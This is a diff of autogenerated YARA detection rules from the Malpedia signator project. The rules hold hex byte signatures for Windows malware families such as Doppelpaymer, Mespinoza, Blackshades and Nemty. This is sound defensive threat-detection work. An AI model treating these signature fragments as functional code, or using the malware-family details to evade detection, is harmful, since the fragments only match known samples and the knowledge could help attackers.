-		$sequence_4 = { ff75f8 03d0 837d6806 52 ffb49d2cffffff 7407 }
-		$sequence_5 = { ff75f8 03d0 837d6806 52 ffb49d2cffffff 7407 e8???????? }
-		$sequence_6 = { e8???????? 8bf8 a1???????? 85c0 752b 8d8424e0000000 }
-		$sequence_7 = { 50 50 50 ffd6 85c0 0f867d010000 8d4801 }
-		$sequence_8 = { b9???????? 8d85b4fdffff e8???????? e8???????? 894508 eb02 }
-		$sequence_9 = { e8???????? 59 8d4594 50 ba???????? e8???????? }
+		$sequence_0 = { ffd6 59 3bc3 59 8945ec 741a }
+		$sequence_1 = { 391d???????? 7420 3bcb 741c 391d???????? 7414 391d???????? }
+		$sequence_2 = { 8bec 83ec10 56 8bf1 807e0400 7561 6a06 }
+		$sequence_3 = { 750b 68???????? ff15???????? ff75d4 }
+		$sequence_4 = { 6a10 68???????? 8d85ecd9ffff 56 50 e8???????? 83c410 }
+		$sequence_5 = { 50 8d85f8fdffff 50 ffd6 8bf8 85ff }
+		$sequence_6 = { 8975dc 0fb68503ffffff 0fb6b512ffffff 8955d0 8945bc }
+		$sequence_7 = { 32c3 741c 3c0a 7418 3c0d 7414 3c5c }
+		$sequence_8 = { 1bc0 83e003 e9???????? 6a06 }
+		$sequence_9 = { 83c418 33db 8d85d8faffff 53 53 53 53 }
 
 	condition:
-		7 of them and filesize < 326182
+		7 of them and filesize < 679936
 }
-rule MALPEDIA_Win_Thunderx_Auto : FILE
+rule MALPEDIA_Win_Solarbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1bae1fb1-24b0-5f06-bb80-f0ccbc902def"
+		id = "49174231-2a30-5980-bda7-c8f930d0210d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.thunderx_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.solarbot_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "5011033895d94d0840d4177429f3e9775d789a180c5872dc899a5e5b8dd320c7"
+		logic_hash = "78704c2bda81ce32f769ec7e509f90cf94c947eb12d602603a0979d813473a0e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91429,32 +91787,32 @@ rule MALPEDIA_Win_Thunderx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4598 03c1 894d8c 6a0d 50 e8???????? 33f8 }
-		$sequence_1 = { 57 b9???????? e8???????? 83f8ff 7413 837e1410 7202 }
-		$sequence_2 = { e8???????? 83c618 3b742428 75f0 8d4c2424 e8???????? e8???????? }
-		$sequence_3 = { e8???????? 83c618 8975c0 eb0d 57 56 }
-		$sequence_4 = { 8b36 53 56 ff7710 50 e8???????? 5e }
-		$sequence_5 = { 50 ff15???????? 85c0 0f85b7000000 837e1408 7202 8b36 }
-		$sequence_6 = { 56 57 6a66 50 ff15???????? 51 50 }
-		$sequence_7 = { e8???????? eb24 8d4de0 e8???????? }
-		$sequence_8 = { 8932 897204 897208 5e 5d c20400 6a18 }
-		$sequence_9 = { 57 8955fc 8b7a14 8bc7 8b7210 2bc6 }
+		$sequence_0 = { c745fc00000000 c745dc18000000 c745e400000000 c745e800000000 }
+		$sequence_1 = { 83ec10 895df0 8975f4 e8???????? 89c6 }
+		$sequence_2 = { 8b55f4 01d0 50 e8???????? }
+		$sequence_3 = { 8b5510 8955fc c745f800000000 6a00 }
+		$sequence_4 = { 8b45f8 8b400c 8b00 8945f4 83c018 8b00 8945fc }
+		$sequence_5 = { 8b4508 8945cc 8b7d0c 8b4510 8b5514 c745c800000000 c745e400000000 }
+		$sequence_6 = { 53 e8???????? 83fe04 750a ff75f0 56 }
+		$sequence_7 = { 0f84be000000 53 e8???????? 89c6 ff75a8 }
+		$sequence_8 = { 8b7508 8b7d0c bb00000000 68cc020000 8d8534fdffff }
+		$sequence_9 = { 89f0 c1e002 038550feffff 8b955cfeffff 8910 81fefa000000 }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Crackedcantil_Auto : FILE
+rule MALPEDIA_Win_Treasurehunter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "52d95e2e-99ba-5a33-908a-7559ea7385c4"
+		id = "742c7bf5-d2b7-520e-a089-1fe564ad2be1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crackedcantil"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crackedcantil_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.treasurehunter_auto.yar#L1-L104"
 		license_url = "N/A"
-		logic_hash = "17b1a73eb9ece6311db723bfa77f75998ebf06320351a537998796263eeb6f3a"
+		logic_hash = "9cfdb80d896aafedd2a1ceb8f4988ae951779a5109bafb233ecba9d043eab6e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91468,32 +91826,30 @@ rule MALPEDIA_Win_Crackedcantil_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff3424 5b 4881ec08000000 48891424 4889e2 4883c208 4881c208000000 }
-		$sequence_1 = { eb7e 488b842490000000 0f57c0 f20f1100 eb6d 488b842490000000 48c70000000000 }
-		$sequence_2 = { f30f7f00 488b8424f0060000 48898424f00a0000 488b9424f00a0000 488b8c24c8000000 e8???????? 488905???????? }
-		$sequence_3 = { f3aa 488d8424c0430000 48898424f0130000 488d152df22c00 488b8c24f0130000 e8???????? 48898424f8130000 }
-		$sequence_4 = { ffc0 488b4c2440 8901 b801000000 eb15 48837c244800 740b }
-		$sequence_5 = { e8???????? 4889442470 c744244000000000 eb0a 8b442440 ffc0 89442440 }
-		$sequence_6 = { f3a4 488d542450 488b8c2480000000 e8???????? 90 488b842480000000 4883c468 }
-		$sequence_7 = { ff742410 ff3424 ff3424 5b 4881c408000000 4881c408000000 688fdfbf7d }
-		$sequence_8 = { e8???????? 90 488d8c24b0130000 e8???????? 90 488d8c24d0130000 e8???????? }
-		$sequence_9 = { f3aa 488d05e9923200 4889842450040000 488b842450040000 488bc8 e8???????? 488d05ca923200 }
+		$sequence_0 = { 8bec 51 53 56 8b35???????? 8bd9 8b4d08 }
+		$sequence_1 = { ba???????? 53 56 57 6a01 }
+		$sequence_2 = { 8bd9 8b4d08 57 8955fc e8???????? 8bce }
+		$sequence_3 = { 56 8bf8 e8???????? 68???????? 57 e8???????? }
+		$sequence_4 = { 85d2 7e0b 4a e8???????? 0fafc6 5e }
+		$sequence_5 = { 57 e8???????? 83c40c be???????? ff36 }
+		$sequence_6 = { 6a2f 68???????? 57 ff15???????? 85c0 }
+		$sequence_7 = { 0f47c7 50 56 53 8945fc ff15???????? }
 
 	condition:
-		7 of them and filesize < 37863424
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Mrac_Auto : FILE
+rule MALPEDIA_Win_Roll_Sling_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6bcb64df-21fc-5709-b420-056c81f6920b"
+		id = "b7e33442-8180-54e6-9eaf-af122cb4c9a7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrac"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mrac_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roll_sling"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.roll_sling_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "ba522542908668fac0a08420f8f0d725096dd1b2d5fd44a72d657a9aa822b86c"
+		logic_hash = "9fbb0c1a994cbf47daa8ad072c8bc3b15bcfbdc43d87e63c5668a5130ba7c10c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91507,34 +91863,34 @@ rule MALPEDIA_Win_Mrac_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bca d1f9 eb03 83c9ff c745bc00000000 c745cc00000000 c745d007000000 }
-		$sequence_1 = { ba01000000 33c9 e8???????? c744243871000000 8bf0 8b4c2438 80f153 }
-		$sequence_2 = { 8b85e0feffff 85c0 0f849b010000 8b9dccfeffff 8b0f 48 8bd6 }
-		$sequence_3 = { 88842454030000 e8???????? 3474 8d8c2448030000 6a06 88842455030000 e8???????? }
-		$sequence_4 = { e8???????? 3451 8d8c24a00e0000 6a0b 888424b20e0000 e8???????? 344c }
-		$sequence_5 = { 6a6f 8884245d010000 e8???????? 0451 8d8c2450010000 6a6f }
-		$sequence_6 = { 3473 88842435140000 8b842420140000 0412 3465 88842436140000 8b842420140000 }
-		$sequence_7 = { 8d8c2478100000 6a15 88842494100000 e8???????? 3454 8d8c2478100000 }
-		$sequence_8 = { c644242100 e8???????? 83c404 8d4c240c 51 57 ffd0 }
-		$sequence_9 = { 888424fa130000 e8???????? 0420 8d8c24f4130000 6a7d 888424fb130000 e8???????? }
+		$sequence_0 = { e8???????? 85c0 0f847ffdffff 488b17 488bca }
+		$sequence_1 = { 7417 488d05642e0100 483bc8 740b }
+		$sequence_2 = { 85c0 488b35???????? 480f4435???????? 4885f6 }
+		$sequence_3 = { ff15???????? 4c8b4308 4c89442440 488b03 83b88c00000000 0f8485000000 }
+		$sequence_4 = { 2bc2 e9???????? 8b5f20 4903d8 448b6724 4d03e0 418bf6 }
+		$sequence_5 = { 85c0 7429 448bc3 488d1521860000 498bce e8???????? 85c0 }
+		$sequence_6 = { eb05 b97e000000 ff15???????? 4533e4 488b742448 488b6c2440 488b7c2450 }
+		$sequence_7 = { 488bc2 488d0dbd150100 0f57c0 488d5308 48890b 488d4808 }
+		$sequence_8 = { 4c8bc7 ba92080000 488bcd ff15???????? 4c8d0c3b 4c8bc3 }
+		$sequence_9 = { 4d0bf0 458b4550 418bf8 f7df 4923fe }
 
 	condition:
-		7 of them and filesize < 745472
+		7 of them and filesize < 299008
 }
-rule MALPEDIA_Win_Batel_Auto : FILE
+rule MALPEDIA_Win_Mespinoza_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "678ea513-45df-57d6-9805-5abca0dd9fcc"
+		id = "33c5af28-80c3-5a94-a560-73cae0098842"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.batel_auto.yar#L1-L235"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mespinoza_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "731869ba11fac648e9df7ba8fc3d93220b79591052bdb6d5c0dfe953901a0596"
+		logic_hash = "f5999e99c1ade61277d31280c07cf2a046437f8e201d1bf42efd1294376814d0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -91546,45 +91902,32 @@ rule MALPEDIA_Win_Batel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 5b c21000 3b0d???????? }
-		$sequence_1 = { 68a00f0000 ffd5 8b1d???????? bf01000000 8d642400 68???????? }
-		$sequence_2 = { 8d642400 68???????? ff15???????? 8bf0 85f6 7422 }
-		$sequence_3 = { 33c0 40 c20c00 55 8bec 81eca0020000 68ee020000 }
-		$sequence_4 = { 68d0202300 68c4202300 e8???????? 59 59 85c0 }
-		$sequence_5 = { 750c 68c6172300 ff15???????? 59 e8???????? 833d????????ff }
-		$sequence_6 = { 6a00 50 c68560fdffff00 e8???????? 83c40c 33c9 b8???????? }
-		$sequence_7 = { 6800002300 e8???????? 83c404 85c0 7454 }
-		$sequence_8 = { 8bec ff7514 ff7510 ff750c ff7508 6862102300 6800302300 }
-		$sequence_9 = { ff15???????? 8bf8 b9a7000000 8db560fdffff f3a5 }
-		$sequence_10 = { 33c9 b8???????? 8a10 88940d60fdffff 83c003 }
-		$sequence_11 = { 55 8b2d???????? 56 57 68a00f0000 }
-		$sequence_12 = { 8bec 81eca0020000 68ee020000 ff15???????? 689d020000 8d8561fdffff 6a00 }
-		$sequence_13 = { 47 83ff5a 7ccd 5f 5e 5d }
-		$sequence_14 = { 6a01 e8???????? 59 6a00 ff15???????? 68d8202300 }
-		$sequence_15 = { 8db560fdffff f3a5 66a5 ffd0 5f }
-		$sequence_16 = { ffd0 56 ffd3 68005c2605 ffd5 }
-		$sequence_17 = { 88940d60fdffff 83c003 41 3d???????? 7cec 56 57 }
-		$sequence_18 = { 68005c2605 ffd5 47 83ff5a }
-		$sequence_19 = { 57 6a40 6800100000 689e020000 6a00 ff15???????? 8bf8 }
-		$sequence_20 = { a1???????? c704242c302300 ff35???????? a3???????? 681c302300 }
-		$sequence_21 = { 681c302300 6820302300 6818302300 ff15???????? 83c414 a3???????? 85c0 }
-		$sequence_22 = { 85c0 7412 ffd0 56 }
+		$sequence_0 = { 85f6 7421 6a2c 6a00 56 e8???????? }
+		$sequence_1 = { 59 837d0800 89460c 7416 85c0 7412 }
+		$sequence_2 = { 50 e8???????? 83650c00 8bce 57 e8???????? 8b4510 }
+		$sequence_3 = { 5d c3 6a34 b8???????? e8???????? 8d45c0 33f6 }
+		$sequence_4 = { 8d8d6cffffff e8???????? 8d45b8 c645fc04 50 8b857cffffff 8d8d7cffffff }
+		$sequence_5 = { 6a07 6a00 68???????? ff75f8 ffd6 }
+		$sequence_6 = { c645fc01 e8???????? 83c418 8d4dd8 56 6a01 e8???????? }
+		$sequence_7 = { 8b5c2420 896c2410 eb08 33ed eb04 8b6c2410 c1e602 }
+		$sequence_8 = { 7404 c60700 47 c1e803 894518 8b01 ff5018 }
+		$sequence_9 = { 8bcf c645fc01 e8???????? 8b03 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 1091584
 }
-rule MALPEDIA_Win_Gamotrol_Auto : FILE
+rule MALPEDIA_Win_Doppelpaymer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6d872926-0049-5e26-8ed8-52fa5b44bb44"
+		id = "fb3d1d6a-8d0f-5691-b315-4261f48416f9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gamotrol_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doppelpaymer_auto.yar#L1-L187"
 		license_url = "N/A"
-		logic_hash = "41c3f31b322da6e7305bb8343f876e03d328f1fa9fbb5d6f4dcd6733da8fcf8b"
+		logic_hash = "5a0db62aabb073b4fe7086dc27996528fad3daef4ecf82aaa9e666c8187cc6f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91598,32 +91941,40 @@ rule MALPEDIA_Win_Gamotrol_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f877b070000 ff2485ab062e00 834de0ff 897588 8975b0 8975c0 8975c4 }
-		$sequence_1 = { 8d45cc 50 897dcc c745f064da2e00 c745e810000000 e8???????? }
-		$sequence_2 = { 83c447 83ec47 41 49 }
-		$sequence_3 = { 8bc6 c1f805 83e61f 6bf628 033485c09e2f00 }
-		$sequence_4 = { 8be5 90 5d 6803010000 }
-		$sequence_5 = { 03f7 85c0 8975ec 0f86f7000000 8d1c83 90 }
-		$sequence_6 = { 50 ff742410 ff742410 ff742420 ff742420 }
-		$sequence_7 = { 83c001 83c728 3bc1 8945f8 0f8caafeffff 5f 5e }
-		$sequence_8 = { 8be5 90 5d 6aff 6a00 68???????? 6a00 }
-		$sequence_9 = { 830d????????ff 33c0 68???????? c705????????e4dd2e00 c705????????54dd2e00 }
+		$sequence_0 = { 80790600 7523 80790264 751d }
+		$sequence_1 = { e8???????? 8b08 e8???????? 3db6389096 }
+		$sequence_2 = { 7517 80790361 7511 80790474 750b 80790173 7505 }
+		$sequence_3 = { 83ec28 6800002002 6a00 6a01 }
+		$sequence_4 = { 80790264 751d 80790561 7517 80790361 }
+		$sequence_5 = { baffffff7f 43 e8???????? 3bd8 }
+		$sequence_6 = { 50 8d4c2454 e8???????? 8bcb e8???????? 8d4c2450 e8???????? }
+		$sequence_7 = { 50 ffd2 8bd8 8b442404 80780400 741b 8b00 }
+		$sequence_8 = { c20400 8d8d5cfdffff e8???????? 80bd50fdffff00 }
+		$sequence_9 = { c20400 8d4de8 e8???????? 8b4df4 8bf1 85c9 74ad }
+		$sequence_10 = { e8???????? 8b4dd8 890c24 8b55e8 89542404 8945bc e8???????? }
+		$sequence_11 = { 31c9 c745f469d9900b 8b5034 8b4008 8955f0 8945ec }
+		$sequence_12 = { 8b75ec 81c61d0b66d6 8b7dc0 897904 }
+		$sequence_13 = { 8945c4 74d0 e9???????? 31c0 }
+		$sequence_14 = { e8???????? 8b4de8 8b55d8 895128 }
+		$sequence_15 = { 894c2404 8945d8 e8???????? 31c0 8b4de8 8b5108 8b7134 }
+		$sequence_16 = { 8d75d1 c745f0e7566258 c645ef3c 8a1d???????? 80fb00 8945c0 894dbc }
+		$sequence_17 = { 8b7e50 897db8 8b7e3c 897dbc 8b7e10 897dc0 8b7e18 }
 
 	condition:
-		7 of them and filesize < 376832
+		7 of them and filesize < 7266304
 }
-rule MALPEDIA_Win_Darktequila_Auto : FILE
+rule MALPEDIA_Win_Mebromi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "269a3731-3e60-523d-8f8e-b11db5f03d72"
+		id = "3d64e85a-906f-5ddb-9f75-04eb426f7ebc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darktequila_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mebromi_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "7a615b9f83311311d3befdcf3fa9a13c4c4dc7e52e3af67816a4aeaa810facc1"
+		logic_hash = "051f5b8119e90ef14be758def00ef62b697ce727969ed9523ac57414d0773faf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91637,34 +91988,34 @@ rule MALPEDIA_Win_Darktequila_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b803000000 e8???????? 6a0b 50 e8???????? 8b4310 }
-		$sequence_1 = { ff15???????? 85c0 740a c705????????01000000 b80b000000 }
-		$sequence_2 = { 85c0 7423 8b4b10 803c085c 7404 c604085c }
-		$sequence_3 = { 8945f8 85c0 7467 8b4b0c }
-		$sequence_4 = { 85c0 740d 8d9b00000000 c60300 43 }
-		$sequence_5 = { 8b4d08 8b15???????? 8901 8913 }
-		$sequence_6 = { 85c0 740d 894610 b801000000 }
-		$sequence_7 = { 895e0c 5b c3 8b5610 }
-		$sequence_8 = { 8bc1 894308 8b45d8 8b4dfc 33cd }
-		$sequence_9 = { 85db 0f84c2000000 56 57 8d4102 e8???????? }
+		$sequence_0 = { 5f eb26 8d4508 8db694702900 6a00 }
+		$sequence_1 = { b82c2900d8 2c29 0000 2d29008a46 0323 }
+		$sequence_2 = { 8bec 8b4508 ff348520712900 ff15???????? }
+		$sequence_3 = { eb0f 0fb6d2 f68201a0290004 7403 }
+		$sequence_4 = { 56 ffd7 3bdd 5b }
+		$sequence_5 = { 68000000c0 68???????? ff15???????? 8b3d???????? 83f8ff a3???????? 7544 }
+		$sequence_6 = { 58 c20c00 ff05???????? 833d????????01 55 56 57 }
+		$sequence_7 = { 68???????? ff742410 ff15???????? 8bf0 85f6 7416 57 }
+		$sequence_8 = { 8888009f2900 eb1f 83f861 7213 83f87a }
+		$sequence_9 = { ff742410 ff15???????? 8bf0 85f6 7416 57 56 }
 
 	condition:
-		7 of them and filesize < 1827840
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Beepservice_Auto : FILE
+rule MALPEDIA_Win_Blackshades_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "600fce17-5c83-5bc3-9824-37a0fdef0a67"
+		id = "be0044cc-ffdd-5ce8-9261-6f20deb49ec5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.beepservice_auto.yar#L1-L268"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackshades_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "e9b2216bc0e3755a16cf68b15ef3152aac9ea65a9d59c9db364017acc5ba848e"
+		logic_hash = "5be1fd8de19e4a88da957f4843427153e72a697b528878c27f4d0e3032429536"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -91676,49 +92027,32 @@ rule MALPEDIA_Win_Beepservice_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd6 8bc8 ff15???????? 50 ff15???????? }
-		$sequence_1 = { 8b0d???????? 68???????? ffd6 8bc8 }
-		$sequence_2 = { 83c408 e9???????? 68???????? e8???????? 83c404 6a00 }
-		$sequence_3 = { 7512 6888130000 68???????? e8???????? }
-		$sequence_4 = { 83f801 7505 e8???????? 68???????? 68???????? }
-		$sequence_5 = { ff15???????? 50 68???????? e8???????? 83c408 e9???????? 68???????? }
-		$sequence_6 = { 683f000f00 6a00 68???????? ff15???????? }
-		$sequence_7 = { 53 ffd7 56 ff15???????? 85c0 5b }
-		$sequence_8 = { 8d85fcfdffff 68???????? 50 ff15???????? 83c410 }
-		$sequence_9 = { 6a14 57 68???????? 89442420 }
-		$sequence_10 = { 6a01 56 ff15???????? 85c0 7513 ff15???????? }
-		$sequence_11 = { 741c 3975fc 7517 57 ff15???????? 68???????? e8???????? }
-		$sequence_12 = { 8bec 81ec04020000 56 57 68???????? 68???????? }
-		$sequence_13 = { f3a4 8b7b08 83c9ff f2ae f7d1 49 83f914 }
-		$sequence_14 = { 52 6800240000 68???????? 56 }
-		$sequence_15 = { 8b5304 83c9ff 8bfa 33c0 f2ae f7d1 49 }
-		$sequence_16 = { 8b8dfcfdffff 51 ff15???????? 8985f0fdffff 83bdf0fdffff00 }
-		$sequence_17 = { 8b5104 52 68???????? e8???????? 83c408 eb0a }
-		$sequence_18 = { e8???????? 83c40c 6a20 6a00 68???????? e8???????? 83c40c }
-		$sequence_19 = { 8b4508 50 56 682a040000 ff15???????? }
-		$sequence_20 = { 50 6a01 e8???????? 83c414 a1???????? }
-		$sequence_21 = { e8???????? 8bb42438010000 8b3d???????? 8d4c240c 51 53 }
-		$sequence_22 = { 6a00 6a04 e8???????? 83c414 85c0 7510 ff15???????? }
-		$sequence_23 = { 668935???????? 7e15 b299 8a9874304000 32da }
-		$sequence_24 = { eb08 c744240c2a040000 8b54242c 8d4c2400 89542414 8b15???????? 56 }
-		$sequence_25 = { 5e 5b 81c428010000 c3 5f 5e 33c0 }
-		$sequence_26 = { ff248548144000 6888130000 6a01 6a00 6a00 6a03 }
+		$sequence_0 = { ff9e0460ff34 6c 60 ff0a }
+		$sequence_1 = { 08fe f5 0200 0000 6c 70ff 9e }
+		$sequence_2 = { 70ff f30004eb f4 02eb fb cf }
+		$sequence_3 = { 351cff1e55 2c00 0d6c04ff1b c700fb301cc9 }
+		$sequence_4 = { 58 2f 60 ff6c74ff }
+		$sequence_5 = { 2a23 60 ff1b 0d002a460c fff5 0200 0000 }
+		$sequence_6 = { 6c ff4a71 70ff 00746c78 ff1b }
+		$sequence_7 = { 6c ff4a71 70ff 00746c78 ff1b 4a }
+		$sequence_8 = { ff6c48ff 6c 4c ff40fc }
+		$sequence_9 = { ff1b 0d002a460c fff5 0200 0000 6c }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 999424
 }
-rule MALPEDIA_Win_Iispy_Auto : FILE
+rule MALPEDIA_Win_Pocodown_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f477a1c5-e3be-5ef8-b32e-8b426be4a34a"
+		id = "80a18124-a9b0-5acb-a47f-4f6b0c30bce1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.iispy_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pocodown_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a63d1814fb9729f25b3d33b430e70a4df7089bb73b4fd099189f97e6642fe502"
+		logic_hash = "0c989d45fa577d150beb78b93b7b2b3b8b608ef00eacc1f315d54d3fff02abed"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91732,32 +92066,32 @@ rule MALPEDIA_Win_Iispy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb05 8b0e 8b7608 51 ff75ec 51 56 }
-		$sequence_1 = { 894c2408 83f80a 7d10 6a0a 8bce e8???????? 8b4e0c }
-		$sequence_2 = { 6808020000 ff5048 8bd8 33f6 85db 7517 }
-		$sequence_3 = { 8b4c2410 8944240c 8b442414 25ffffff7f 89542408 0bc8 }
-		$sequence_4 = { 0fb60455c1820210 8803 43 eb05 80c230 }
-		$sequence_5 = { e8???????? 8b4f0c 8d0431 89470c 85c9 7465 6a00 }
-		$sequence_6 = { 55 8bec 8b4508 53 57 8d1c8500d30210 }
-		$sequence_7 = { 85c0 8b45b8 7424 8b55e0 b9???????? 81c208020000 0f45ca }
-		$sequence_8 = { 894c2414 3ad0 7610 49 894c2414 381431 757f }
-		$sequence_9 = { 743a 56 ff75c4 8d4dc8 e8???????? 8b7de0 85ff }
+		$sequence_0 = { ffe1 8b44243c 8bcb 8bd3 39450c 0f94c1 413bcb }
+		$sequence_1 = { eb1b 488b542448 488b4c2430 e8???????? e9???????? 488b442430 eb13 }
+		$sequence_2 = { e8???????? 4533c0 488d542430 488d4c2450 e8???????? 488d4c2450 e8???????? }
+		$sequence_3 = { eb02 8bd6 f6c202 7408 49ffc2 493bc0 75dc }
+		$sequence_4 = { c744242002000000 e9???????? 33c0 83f801 0f844f010000 48b80000000001000000 4839442450 }
+		$sequence_5 = { eb38 8b842480000000 89442420 4c8b4c2458 488b442478 4c8b4020 488d15f0bf1e00 }
+		$sequence_6 = { e8???????? 482be0 488b442450 4883781000 740c 488b442450 4883781800 }
+		$sequence_7 = { ff5010 85c0 7507 33c0 e9???????? 488b442460 488b4008 }
+		$sequence_8 = { e8???????? 33c0 e9???????? 486344244c 488b4c2438 4803c8 488bc1 }
+		$sequence_9 = { e8???????? 85c0 7505 e9???????? 837c243841 7e05 e9???????? }
 
 	condition:
-		7 of them and filesize < 397312
+		7 of them and filesize < 6703104
 }
-rule MALPEDIA_Win_Nefilim_Auto : FILE
+rule MALPEDIA_Win_Nemty_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1a64ad05-cdf4-50b0-b5d5-12b823b566f1"
+		id = "ed44110a-96dc-5598-9b44-575420ef007c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim"
